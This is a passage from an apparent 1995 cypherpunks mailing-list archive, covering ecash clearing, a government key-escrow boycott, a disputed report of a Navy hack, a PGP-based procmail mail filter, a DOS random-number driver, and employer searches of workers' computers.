	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Fri, 22 Dec 95 08:47:23 PST
To: fc@all.net
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512221202.AA06399@all.net>
Message-ID: <55vin93uyk.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


On Cypherpunks, fc@all.net (Dr. Frederick B. Cohen) said:

FBC> Following is the actual text extracted from iw@all.net - I doubt if
FBC> the U.S. DoD will want to release all the details, but we can ask!

	Strange, Dr Fred, this isn't the 'actual text' I saw quoted in
RISKS Digest - did you 'fix' it so that it was a bit more credible?

Dr Fred's paragraph:

FBC> 100% wrong - he was an insider, he had a great deal of assitance,
FBC> he had cryptographic devices and keys, and he had special insider
FBC> knowledge.  If he was an Air Force captain, he could not have been
FBC> all that young.  Whizzkids are usually considered teenagers.
FBC> Anyone know of any teenaged AF captains these days?

RISKS Digest's paragraph:

RISKS> 100% wrong - he was an insider, he had a great deal of
RISKS> assistance, he had cryptographic devices and keys, and he had
RISKS> special insider knowledge.  If he was a Navy captain, he could
RISKS> not have been all that young.  Whizzkids are usually considered
RISKS> teenagers.  Anyone know of any teenaged Navy captains?

	Has anyone seen the REAL IW article, so we can tell what was
really said?  The age difference between an AF captain and a Navy
captain is enough that one could be considered a 'whizzkid' in the
military, while the other could not.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Junk email is NOT appreciated.  If I want to buy something, I'll find
you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Jacoby" <rjacoby1@osf1.gmu.edu>
Date: Fri, 22 Dec 95 07:52:46 PST
To: libernet-d@Dartmouth.EDU
Subject: Re: GAK boycott, What are legal implications?
In-Reply-To: <30d9ca78.flight@flight.hrnowl.lonestar.org>
Message-ID: <Pine.OSF.3.91.951222104632.5379A-100000@osf1.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Dec 1995, Paul Elliott wrote:

Gee, being legally responsible for lost revenue over a boycott.  Rev. Donald 
Wilmond is going to be very broke!  I don't know anything about the NAACP 
case, but it seems to me that free speech & merely *urging* people to 
boycott would be a perfect defense.


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Here is a question for all of you cyber legal types out there.
> This question presupposes: 
> 
> The NIST will complete its work on the GAK standard. But no law will be
> passed (yet) regulating the use of encryption in the U. S. (The GAK standard 
> is an attempt to create an environment in which such laws can be passed.) 
> In the U.S., Big Company INC will start marketing a GAKed encryption 
> product domesticly.
> 
> A bunch of cypherpunkish types will immediately try to organize a boycott
> against BIG COMPANY.
> 
> What are the cypherpunks legal risks?
> 
> I seem to remember that back in the 70s, the NAACP lost a big case
> with respect to their boycott in a southern city. As I recall there were people
> in the street begging money for the NAACP because there was a > 10**6 $
> judgement against the NAACP and they needed that much just to appeal.
> 
> 
> - -- 
> Paul Elliott                                  Telephone: 1-713-781-4543
> Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
>                                               Houston Texas 77063
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMNnJ8/BUQYbUhJh5AQGbsgP/T0n31SqeuHt+7AbizymcEhu/78DUuym5
> sj+MO3ruA9WcEBQUXfabuf/PgOwlrtUAcC3dISPvXwGbdygc9oHBfxSglLi48g7d
> dvDS4wziRHF7N8sBsYn0ee9YyKhPd9U7Ci0ovOc5frFGSZ2Bt4hU703d7bR+6cB+
> iHHqsPaAa6o=
> =EPoj
> -----END PGP SIGNATURE-----
> 
> 

Robert A. Jacoby	(speaking only for myself--not legal advice)
Assistant Law Librarian for LAN/Reference
George Mason University Law Library
(703) 993-8107
rjacoby1@osf1.gmu.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Fri, 22 Dec 95 08:55:49 PST
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199512221717.LAA02498@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>        [snip]
>        There is a company called Optoelectronics that markets a radio
reciever 
>         called the Interceptor.  This is a broad band (several hundred MHz) 
>         device designed to lock on to the most powerful signal around,
>         regardless of frequency.  As supplied, it only has a rubber duck 
>         antenna, but a broadband, directional antenna (Log Periodic?)
could be 
>         attached.  There are AM and FM versions that output audio and a
version
>         called the Scout that controls a scanner.  These could have outboard 
>         devices hung on to them to decode digital signals, record the 
>         conversation ... all for less than $1000.
>
>        
>
>        Floyd D. Barber
>        floyddb@alpha.c2.org
>        Key fingerprint:
>        8A 98 1F 6B 70 7A FE 24 
>        35 D4 48 CF 9D F6 B0 91

The problem with the Interceptor is that I think it can only receive one
freqency at a time, and it is adjustable by a thumb wheel, not digitally.
This would tend to make changing frequencies at high rates VERY hard. :)
Also it has no frequancy readout, so this means that if you know what freq.
you should be at it is hard to tune in that freq. without searching a little.  
                        Dr0id


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Thu, 21 Dec 95 20:23:01 PST
To: Marcel van der Peijl <bigmac@digicash.com>
Subject: [ecash] Re: Multi-issuer questions
In-Reply-To: <199512191429.PAA01228@digicash.com>
Message-ID: <Pine.SUN.3.91.951222104221.12614B-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, Marcel van der Peijl wrote in the ecash mailing list:

> Q: If user A signs up with bank A, and merchant B signs up with bank B, 
> can user A buy at merchant B?
> 
> A: In theory:
> 
> Bank A and bank B need to have an interbank clearing agreement. User
> A sends his money to merchant B. Merchant B contacts his own bank,
> bank B. Bank B recognizes the money as being issued at bank A,
> contacts bank A, and clears the coins there. Bank A credits bank B's
> account at bank A, bank B sends an acknowledge to merchant B and
> merchant B sends the goods to user A.

	I dispute this even on theoretical grounds.  

Am I right in assuming that the only reason Bank B has in contacting Bank
A is to confirm that the ecash hasn't been double spent?  Once that is
confirmed, there should be no need for contact between the two banks. 
Bank A should not have to credit Bank B's account as there has been no
transfer from Bank A to Bank B.  The transfer has been the deposit from
Bank B's customer to Bank B. Bank B is allready "credited", i.e., its 
(e)cash researves have increased, the moment Bank A confirms that the 
ecash is valid.

But this also makes a second assumption: that ecash is truly an open 
standard, i.e., that ecash is a "widely acceptable means of payment."  
Any ecash issuing bank must be obligated to accept customer ecash 
deposits with one and only one condition: that the originally issuing bank 
must validate it.

Now what if this weren't so?  What if Bank B said "I didn't originally
issue this ecash and thus, I wont accept its deposit."  Now this puts the
"cashness" of ecash into some jeopardy. It doesn't immediately make ecash 
useless, but it puts an auxiliary condition to it.  This concerns the 
difference between Validation and Acceptance.  Validation is when Bank B 
checks the ecash with its original issuer to see if it has been double 
spent.  Acceptance is actually accepting that ecash as a deposit.  

If Bank B refuses to Validate any non-Bank-B ecash then ecash pretty much
fails.  Period.  How would Bank B's customer be able to handle commerce
with non-Bank-B buyers?  By having multiple accounts with multiple Banks? 
What if the number of ecash issuers mushrooms into the hundreds?  In
anology, would you want to have to have accounts in 500 banks if your
customers also used 500 different banks?  The other alternitive for the
ecash case would be if Bank-B's-customer could bypass Bank-B by validating
the ecash directly with Bank A.  If it passes, then he must now look at 
the matter of Acceptance.

Now Bank-B's-customer knows that the ecash is valid.  He keeps it
temporarily in his hard disk.  But will Bank B ever Accept it as a
deposit?  If it doesn't, then Bank-B's-customer needn't worry that much. 
He can just use that ecash for transactions purpases.  Just because you
can't deposit every cent of cash that you earn doesn't mean that your cash
is worthless.  The fundamental test of ecash is whether merchants/customer
will accept it.  Of course, there is also important value in checking if
Banks will accept deposits of it, but I consider that secondary. 
 
So some concluding topics include:

+ independant verification of ecash.  some formal system for ecash
merchants (sellers) to check directly with the issuing bank that the 
ecash hasn't been double spent.

OR

+ interbank verification of ecash.  formal interbank system for the
cleints bank to check the issuing bank to see if the ecash hasn't been
double spent. 

AND

+ interbank acceptance of ecash.  formal acceptance of verified ecash 
deposits, no matter the issuing bank.

The type of verification doesn't really matter that much.  Some sort of 
distributed method of resolving ecash issuers has to be standardized (say 
like the DNS, each ecash coin has some information as to the issuer.  
person/bank that wants to verify just transmits that ecash to its 
original issuer and then receives a reply saying: verified (usable) or 
not (double spent).

The interbank acceptance issue is more important, but digicash (the
company) has some power here.  If they really aim at ecash beeing true
cash (instead of checking), then they gotta force all issuing banks to
accept ecash deposits nomatter the original issuer.  Like the Real Life
cash system: all banks accept cash, even though it is the federal researve
that was the original issuer. 


-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Hamilton <martin@mrrl.lut.ac.uk>
Date: Fri, 22 Dec 95 07:48:35 PST
To: cypherpunks@toad.com
Subject: Re: Navy hacked by Air Force?
In-Reply-To: <9512221202.AA06399@all.net>
Message-ID: <199512221547.PAA27415@gizmo.lut.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Dr. Frederick B. Cohen writes:

| > The exact method of entry remains a classified secret.
| 
| The first (only?) really true part of the story.

To combine two favourite threads - it's that sendmail 8.7.3 hole 
*they* don't want you to know about...!

Cheerio, (and Merry Xmas :-)

Martin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sat, 23 Dec 95 02:30:26 PST
To: cypherpunks@toad.com
Subject: Re: Cypherpunks resumes?
Message-ID: <9512231030.AA05276@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: attila the Hutt

	So, who the fuck am I?  --just another aging 300 lb gorilla, 
    long haired hippie California freak with an outlaw chopper. 

...................................................


Such a lovely place... such a lovely face...
            <g>


(sorry, I couldn't help myself)
  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Juzzy <trance@techno.magna.com.au>
Date: Mon, 22 Jan 96 14:21:25 PST
To: cypherpunks@toad.com
Subject: ecash
Message-ID: <Pine.LNX.3.91.951223091637.119A-100000@techno.magna.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

	I'm new to this mailing list and i was wondering if someone could 
post me some information on ecash, what it is, and its implementation.

						Thank You

						Justin Walker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 23 Dec 95 09:11:00 PST
To: cypherpunks@toad.com
Subject: PAN_maw
Message-ID: <199512231710.MAA23442@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-23-95. WashP:


   CyberCash this week plans to offer its shares of stock to
   the public. It is one of a handful of fledgling companies
   that hope to coin profits by helping others make financial
   transactions on the Internet. But consumers still worry
   that hackers on the Internet can ferret out credit card
   information. CyberCash's technology blocks online seeing of
   unscrambled credit card numbers. CyberCash and its IPO
   advisors believe they have developed schemes that will
   convince lemmings that there is the equivalent of
   steel-plated armor around their life savings as they vanish
   into the Internet's mega-panamaW$.

   "This is the latest Internet digital currency slaughter-
   offer for fat-fee hacking our Widows and Orphans Ever-Safe
   Pensions," choraled a split-gut ice-eyed Santanalyst.

   PAN_maw  (5 kb)














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 24 Dec 95 09:14:09 PST
To: ericm@lne.com (Eric Murray)
Subject: Re: CFS and Linux
In-Reply-To: <199512241606.IAA04460@slack.lne.com>
Message-ID: <199512241717.MAA29337@homeport.org>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:

| Where we're headed is mail filters with PGP imbedded (PGP 3 will
| make this much easier) that check incoming mail for a valid signature
| for certain PGP keyid/fingerprints and pass that mail along.
| Other mail that doesn't match gets tossed into a 'junk' folder
| or thrown away if you really don't want to talk to anyone that you
| don't already know.

I agree with the assesment of where we may be going, but the
technology is available now.  (Marshall Rose uses it; if you want to
get mail into his private mailbox, offer him some $ via imbedded FV
authorizations in the mail, and it goes into his inbox.  If he thinks
it was worth his time, he doesn't charge you.)

Anyway, the code is defeintely available now.  The back end is a
little kludgy, but it was needed for an auto ley retreival script.
This could easily be hacked to include a +pubring=$people line.  The
script gives you a keyid, which you can then use to filter on, ie:

:0BW
* -----BEGIN PGP
KEYID=|sender_unknown
# the sender unknown script is below

:0:
? [ $KEYID = (`cat .buddies`) ]
| /var/spool/mail/adam

:0e:
junk

#!/bin/sh
# unknown returns a keyid, exits 1 if the key is known
# $output is to get the exit status. Othierwise, this would be a one liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode  -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$? 
if [ $EV -eq 0 ]; then 
        echo $OUTPUT | awk '{print $6}' 
fi
exit $EV


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@techwood.org (Ben Combee)
Date: Wed, 27 Dec 95 08:11:43 PST
To: cypherpunks@toad.com
Subject: Austin CPunk Video Update
Message-ID: <199512271611.KAA16961@matrix.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


First, a lot of thanks to all of you who sent me ideas for the
Cypherpunk video we are working on here in Austin.  I'm sorry I
haven't individually acknowledged all of you, but it was been a
busy couple of months.

Here is our status:

We have agreed on the meeting infrastructure, with a video working
group meeting twice a month of planning/strategy meetings and at
other times for filming, editing, and so on.

We have decided to do a 30 minute video with segments dealing with
crypto history, basic theory, popular applications, and possible
futures.  We may go one to produce further videos which look at
these topics in more detail.

We have a outline of the segments of the video.  The outline was
originally conceived for a 60 minute program, so some items might
have to be cut.  This outline should be available online sometime
soon off my web page at http://www.yak.net/combee/crypto/ (URL not
yet active).

This program will initially air on Austin's public access stations,
but we have nebulous plans to distribute it once that requirement
is met.

Questions?  Just write to me or to all the Austin CPunks at
austin-cpunks@einstein.ssz.com.

-- 
        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Wed, 27 Dec 95 08:12:06 PST
To: cypherpunks@toad.com
Subject: Re: a new idea: stocks == currency
Message-ID: <199512271611.LAA20760@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



> I've not seen promoted by any single author yet (although I have seen
> some prominent cpunks argue the opposite).

There was a book written some time ago called "SuperMoney" that basically
argues this point (that stocks were not only money, they were *better*
than money).

One example would be a deposit at a bank.  How can you tell if there is a
potential solvency problem at the bank?  One quick and easy check is to
look at the value of the stock of the bank!

You see this behavior in currencies when you are exchanging a stronger one
for a weaker one or vice versa :-)

PS: I read Prechter's "turn of the tidal wave" book over the holidays, and
although it is mostly dry, it is an interesting read.

Regards,

Mark Hittinger
Netcom/Dallas
bugs@freebsd.netcom.com
bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Dec 95 03:40:38 PST
To: cypherpunks@toad.com
Subject: Re: New release (v.1.3.2) of CFS Unix encrypting file system available
Message-ID: <199512271140.MAA04896@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>Source code for the latest version (release 1.3.2) of CFS, the Cryptographic
>File System, is now available upon request for research and experimental
>use in the US and Canada.

Does anyone know if this code has made it across the pond yet?

If so please post the ftp location to sci.crypt or comp.os.linux.misc.
I don't read this list.

Thanx.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "T.R. Cox" <tadc@thetics.europa.com>
Date: Wed, 27 Dec 95 16:52:05 PST
To: nobody@mail.uu.net
Subject: Re: BoS: Re: Misconfigured Web Servers
In-Reply-To: <9511278200.AA820083186@cc2.dttus.com>
Message-ID: <Pine.SUN.3.91.951227164940.5515F-100000@thetics.europa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, David Klur wrote:

>      
>      Re: the "trick" below... an even more effective search is the 
>      following...
>      
Is it just me, or is everyone getting a dozen of these?

////////////////////////////////////////////////////////////////////////\
|Thaddeus Cox = tadc@europa.com <==- Finger for standard legal disclaimer|
|\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|Are you using Europa?  You ought to be-- Dial 503.222.4244, login as new |
\/////////////////////////////////////////////////////////////////////////





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason D. Livingood/WSC"@hks.net
Date: Wed, 27 Dec 95 13:54:19 PST
To: cypherpunks@toad.com
Subject: Employer Probing Precedents?
Message-ID: <199512272151.QAA05241@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To Whom It May Concern:

I was curious as to where I might find some electronic freedom legal 
precedents.  If, for example, an employer was planning to probe file systems on 
PCs in the off-hours and employees began encrypting their hard drives, what 
legal precedents would support the employees or would support the employer in 
blocking the encryption?

Thanks for any info you can give me!!

Jason Livingood
jlivingood@hammer.net 

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOG/6ioZzwIn1bdtAQHQ2QF/cOq8vE9o+V/yGuk5KLbYv5E6xWJjV2cB
pSHFhr4O0HtiTgOtTxMhylVmXFZpuosm
=fIWG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.dfw.net>
Date: Wed, 27 Dec 95 16:49:25 PST
To: Lou Poppler <lwp@mail.msen.com>
Subject: Re: Reputation capital: FIBS case study
In-Reply-To: <2sY4wMz2BcRC083yn@mail.msen.com>
Message-ID: <Pine.SUN.3.91.951227183553.9402A-100000@dfw.dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Dec 1995, Lou Poppler wrote:

> 
> I'm not really asking for suggestions here or anything.  It's likely that
> most of them have already been debated to death on r.g.b.  I just wanted
> to show you a case of reputation markets in action.

If the server can keep track of drop games and the restart it should not
be diffucult to keep a record for each player of how many games he
has dropped and not restarted. A high number would mean a cheater
or someone with a very bad phone line. In either case you dont want to play
with them.

For the second problem there is no easy solution. One thing to make it more
anoying for the cheater is to keep a history of matches played by each
players. A player that has played 50 matches with anotherone an won all
is either cheating or not looking for a challange. Of curse the cheater
just has to create a new nym each time to play agains in this case.
Bottom line is that on the net a nym can be multiple persons and a person
can have multiple nyms.

> ::::::::::::::::::::::::::::::::::::::    Thank you VERY much!  You'll be 
> ::  Lou Poppler <lwp@mail.msen.com> ::   getting a Handsome Simulfax Copy 
> ::      http://www.msen.com/~lwp/   ::   of your OWN words in the mail
> ::::::::::::::::::::::::::::::::::::::   soon (and My Reply).
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Thu, 28 Dec 95 10:52:58 PST
To: "cypherpunks@toad.com>
Subject: FW: proposal for new cyber abbreviation
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG951228104009PV00ED00@red-70-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


TOBAL - There Oughta Be A Law...

Same thing, easier on the mouth.

Kurt

----------
From: 	Vladimir Z. Nuri[SMTP:vznuri@netcom.com]
Sent: 	Wednesday, December 27, 1995 11:47
To: 	cypherpunks@toad.com
Subject: 	proposal for new cyber abbreviation


yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc.
ad nauseam. (I have reason to believe that PTB, or "powers that be" was
actually invented here on this list!!) 

anyway after reading recent messages I propose:

SHTBD!!!!

as in, Something Has To Be Done.

used either seriously or satirically (probably mostly satirically by
everyone here).

example:

"there was a editorialist on TV ranting about the 4 horsemen of the
infocalypse and screeching that SHTBD!!!"

or,

"I was not implying that SHTBD, merely that we are moving into a brave
new world in cyberspace".

or,

"those @#$%^&* online pedophiles are crawling all over the net. SHTBD!!!"

or,

"the @#%^^&* mainstream press is always pointing out new bogeymen
with the concluding moral, SHTBD!!!"


notice that SHTBD is the antithesis of cypherpunk philosophy in that
it tends to imply

1. government intervention
2. coercive force
3. censorship

etc.

hence by using this term and popularizing it, we promote our own agenda
of "cryptoanarchy".

just my small contribution to humanity for today.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Thu, 28 Dec 95 10:11:46 PST
To: futplex@pseudonym.com
Subject: Re: Telcom bill report
Message-ID: <01HZCBJ2O0DC8Y55KS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"futplex@pseudonym.com" 28-DEC-1995 01:20:39.13

>Thanks ever so much for posting my non-list-relevant private mail to the list.
------------
	Oh, bloody hell. Oops... you (and anyone else bothered by the, as you
point out, irrelevant mail) have my sincerest apologies. I didn't notice the
lack of a CC: to cypherpunks (it's buried in the headers and I was lacking in
sleep, but that's no excuse), and consequently goofed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 28 Dec 95 12:44:44 PST
To: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: DOS - MD5 - Thanks
In-Reply-To: <Pine.3.89.9512271424.D29727-0100000@wane3.scri.fsu.edu>
Message-ID: <199512282039.PAA21627@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"P.J. Ponder" writes:
>Thanks to everyone who offered help on the MD5 for DOS.
>Greg Broiles pointed me to the pgp source, which may do the
>trick. (There is MD5 module in pgp[?]) I will investigate.
>
>For everyone's info, didn't find a freestanding dos 
>implementation, tho.  My copy of Schneier didn't have the
>disk, so I don't know if it's there, either.

I have source code to a program called "md5sum".  The comments indicate
that it works on DOS, as well as unix.  It's three source files, a
"main", a ".h", and "md5.c", which implements the md5 hash.

Want it?

P.S.  There's also source code for MD5 in the RFC1321, available
from ftp.internic.net.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Thu, 28 Dec 95 12:25:56 PST
To: cypherpunks@toad.com
Subject: ANNOUNCE: NOISE.SYS random sampling device for DOS v0.2Beta
Message-ID: <199512282034.PAA25359@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Re: NOISE.SYS Random Sampling Device Driver for DOS (v0.2-Beta):

I've finally gotten a usable version of NOISE.SYS written.  The beta
is ready for semi-public release and review.  If you're interested in
testing it or examing the code, email me at <wlkngowl@unix.asb.com>

It's only a prototype version.  I do not know any strong methods of
testing random data.  If anyone is willing to help on that part or
point me in the right direction, it would be appreciated...

What this driver does:

When loaded, it hooks onto the keyboard interrupt (0x09) and collected
fast timings between keystrokes.  It can also be easily configured at
compilation to sample other interrupts, as well as collect "seedling"
keystrokes upon initialization.

It sets up a character device called RANDOM, that when polled takes
the earliest collected bytes from the random pool (size can be adjusted),
combines them with a count-word based on the number of samples collected
plus the number of times the driver has fetched data from the pool,
transforms it using the Secure Hash algorithm, and outputs the bits from
the hash.

It's only a prototype: this version doesn't check to see if the pool is
"empty" at the moment.

Features: written in 386 assembler, takes under 2k of memory and can be
loaded from the command line using a utility like DEVLOD.  Also under
GPL, so you've got the source-code to play with.

Comments and criticism from crypto-gurus would be greatly appreciated.
Reply if you'd like me to send a copy.  (Important Q: is this software
covered under ITAR?!?)

- --Rob <wlkngowl@unix.asb.com>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOL8gNscUKerH0gxAQHNlAP/eZChSaAEg3go/vxfm9Z0Af5Dfa4WBDhh
SfbbpsYfymSkxFbU7bHUfRMFHk+Uy57AeGMUxXkgml7KO8cxyOPS6yVDcNWf6Z9W
OeXtXRAFBWRn3CblT1sQzl5YCEG93YBZS9ZkbTsN4rgTcpo15QY8vG5BJCEgfP9f
9XHn5VGSkVo=
=jaNN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Thu, 28 Dec 95 12:26:14 PST
To: cypherpunks@toad.com
Subject: ANNOUNCE: NOISE.SYS random sampling device for DOS v0.2Beta
Message-ID: <199512282034.PAA25370@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Re: NOISE.SYS Random Sampling Device Driver for DOS (v0.2-Beta):

I've finally gotten a usable version of NOISE.SYS written.  The beta
is ready for semi-public release and review.  If you're interested in
testing it or examing the code, email me at <wlkngowl@unix.asb.com>

It's only a prototype version.  I do not know any strong methods of
testing random data.  If anyone is willing to help on that part or
point me in the right direction, it would be appreciated...

What this driver does:

When loaded, it hooks onto the keyboard interrupt (0x09) and collected
fast timings between keystrokes.  It can also be easily configured at
compilation to sample other interrupts, as well as collect "seedling"
keystrokes upon initialization.

It sets up a character device called RANDOM, that when polled takes
the earliest collected bytes from the random pool (size can be adjusted),
combines them with a count-word based on the number of samples collected
plus the number of times the driver has fetched data from the pool,
transforms it using the Secure Hash algorithm, and outputs the bits from
the hash.

It's only a prototype: this version doesn't check to see if the pool is
"empty" at the moment.

Features: written in 386 assembler, takes under 2k of memory and can be
loaded from the command line using a utility like DEVLOD.  Also under
GPL, so you've got the source-code to play with.

Comments and criticism from crypto-gurus would be greatly appreciated.
Reply if you'd like me to send a copy.  (Important Q: is this software
covered under ITAR?!?)

- --Rob <wlkngowl@unix.asb.com>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOL8gNscUKerH0gxAQHNlAP/eZChSaAEg3go/vxfm9Z0Af5Dfa4WBDhh
SfbbpsYfymSkxFbU7bHUfRMFHk+Uy57AeGMUxXkgml7KO8cxyOPS6yVDcNWf6Z9W
OeXtXRAFBWRn3CblT1sQzl5YCEG93YBZS9ZkbTsN4rgTcpo15QY8vG5BJCEgfP9f
9XHn5VGSkVo=
=jaNN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 28 Dec 95 13:26:59 PST
To: David Mandl <dmandl@bear.com>
Subject: Re: Employer Probing Precedents?
In-Reply-To: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
Message-ID: <199512282126.QAA22624@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


David Mandl writes:
>All I'll say here is that I disagree strongly with the views Tim May
>posted about employees' property rights, etc. (though we agree on most
>other things).

I have to agree with David.

I don't think that "property rights" are quite as clear-cut as Tim
claims.  By granting use of certain equipment to a single employee,
such as a desk, a uniform, or personal computer, the employer has
invested that employee with a vague sort of limited ownership of the
item.

The notion that, simply because you're wearing a uniform owned by your
employer, you're subject to physical search at the employer's
discretion is laughable.  The difference between this and searching the
computer on one's desk differ only in degree, IMO.

